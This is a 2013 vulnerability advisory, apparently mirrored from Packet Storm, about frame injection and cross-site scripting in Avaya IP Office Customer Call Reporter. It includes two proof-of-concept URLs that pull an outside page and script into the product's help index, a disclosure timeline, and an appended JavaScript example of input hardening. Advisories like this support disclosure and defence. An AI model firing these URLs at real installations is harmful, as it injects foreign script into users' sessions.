Avaya IP Office Customer Call Reporter 8.0.9.13 XSS

2013-08-22T00:00:00
ID PACKETSTORM:122910
Type packetstorm
Reporter MustLive
Modified 2013-08-22T00:00:00

Description

Hello list!  
  
I want to warn you about vulnerabilities in Avaya IP Office Customer Call  
Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site  
Scripting) vulnerabilities.  
  
After I found multiple vulnerabilities in Avaya IP Office Customer Call  
Reporter in December, I informed ZDI about them (the critical ones). ZDI was  
very slow in processing these holes (despite my reminders) and only on the  
30th of July did they begin actively working on them. I wrote about this  
case with ZDI in the WASC Mailing List  
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html).  
  
When Avaya ignored my notification in July and ZDI stopped working on this case  
in August (since Avaya was not responding to them either), I published these  
two vulnerabilities (the least critical). There are many other  
vulnerabilities, including critical holes which allow taking control of the  
admin panel, so Avaya still has a chance to get details of the vulnerabilities  
in their product before public disclosure.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in  
December 2012) and 9.0.0.0 (tested recently) and previous versions.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Avaya Inc.  
http://www.avaya.com  
  
----------  
Details:  
----------  
  
Remote HTML Include (Frame Injection) (WASC-12):  
  
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua  
  
Remote XSS Include (Cross-Site Scripting) (WASC-08):  
  
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html  
  
------------  
Timeline:  
------------   
  
2012.12.06 - found multiple vulnerabilities (these ones and other critical  
holes).  
2012.12.13 - informed ZDI about other critical vulnerabilities.  
2012.12.18 - again informed ZDI about other critical vulnerabilities.  
2013.01.27 - registered at zerodayinitiative.com and informed them through  
the site. ZDI started working on the case.  
2013.07.28 - informed Avaya (via two contact forms) about these holes and  
other critical vulnerabilities, due to the slowness of ZDI.  
2013.07.29 - wrote about ZDI in the WASC Mailing List.  
2013.07.30 - if earlier ZDI had only pretended to work on the case, this  
time they started working on it actively (and tried to contact Avaya).  
2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was  
not responding.  
2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
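The two URLs in the Details section are consistent with a help index page that takes whatever follows `?` and loads it as the source of a content frame, so a protocol-relative value such as `//websecurity.com.ua` pulls a foreign page (or script) into the product's origin. The following is an added example, not Avaya's code and not part of the advisory: the assumed vulnerable pattern beside a hardened version that only accepts a relative `.htm`/`.html` path inside the help tree and otherwise falls back to a default topic. The function names, the `DEFAULT_TOPIC` value and the idea that `index.htm` works this way are all assumptions.

```javascript
// Added example (not Avaya's code). Assumption: the help index reads the
// frame target from location.search, as the advisory's URLs suggest.

// Vulnerable pattern (assumed): everything after "?" becomes the frame src.
// "?//websecurity.com.ua" is protocol-relative, so the browser resolves it to
// http(s)://websecurity.com.ua and frames that site inside the help page;
// an .html target there can then carry script (the XSS variant).
function vulnerableFrameTarget(search) {
  return search.startsWith('?') ? search.slice(1) : search;
}

// Hardened version: allowlist a relative path under the help tree only.
const DEFAULT_TOPIC = 'welcome.htm'; // assumed fallback topic name

function safeFrameTarget(search) {
  let raw = search.startsWith('?') ? search.slice(1) : search;
  try {
    raw = decodeURIComponent(raw); // normalise %2F etc. before checking
  } catch (e) {
    return DEFAULT_TOPIC;          // malformed encoding: refuse it
  }
  if (raw === '') return DEFAULT_TOPIC;
  // Any scheme prefix (http:, https:, javascript:, data:, ...) is rejected.
  if (/^[a-z][a-z0-9+.\-]*:/i.test(raw)) return DEFAULT_TOPIC;
  // Protocol-relative (//host), absolute (/path) and backslash (\\host) forms.
  if (raw.startsWith('/') || raw.includes('\\')) return DEFAULT_TOPIC;
  // Only plain path characters: no "?", "#", "@", whitespace or control bytes.
  if (!/^[A-Za-z0-9_\-./]+$/.test(raw)) return DEFAULT_TOPIC;
  // No ".." traversal and no empty segments ("a//b").
  if (raw.split('/').some((seg) => seg === '..' || seg === '')) return DEFAULT_TOPIC;
  // Must name a help topic file, not a directory or other resource.
  if (!/\.html?$/.test(raw)) return DEFAULT_TOPIC;
  return raw;
}

// In the page itself the call would be, for example:
//   document.getElementById('content').src = safeFrameTarget(location.search);
// The decision to allowlist (rather than blocklist "//" alone) is deliberate:
// "/\\evil", "http:evil" and "%2F%2Fevil" are all handled by the same rules.
```

Served alongside the hardened page, a `Content-Security-Policy` with a restrictive `frame-src` directive gives a second, browser-enforced layer in case a future code path again forwards user input into a frame.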